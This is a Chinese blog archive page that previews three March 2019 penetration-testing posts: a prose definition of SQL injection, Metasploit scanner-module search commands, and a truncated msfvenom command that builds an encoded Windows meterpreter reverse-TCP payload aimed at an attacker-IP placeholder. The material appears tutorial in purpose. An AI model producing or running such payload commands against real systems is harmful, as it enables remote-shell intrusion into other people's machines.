03 2019 档案

摘要:SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,它是利用现有应用程序将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句. 阅读全文
posted @ 2019-03-31 17:39 lyshark 阅读(8321) 评论(0) 推荐(1) 编辑
摘要:MSF 服务发现 常用来发现局域网内,的常见服务,比如HTTP,FTP,TELNET等. MSF模块搜索: [root@localhost ~]# msfconsole msf5 > search scanner type:auxiliary msf5 > search scanner/http t 阅读全文
posted @ 2019-03-20 16:47 lyshark 阅读(1374) 评论(0) 推荐(1) 编辑
摘要:Windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 - 阅读全文
posted @ 2019-03-20 12:07 lyshark 阅读(1633) 评论(0) 推荐(0) 编辑


8927987 | 6877438
博客园 - 开发者的网上家园

点击右上角即可分享
微信分享提示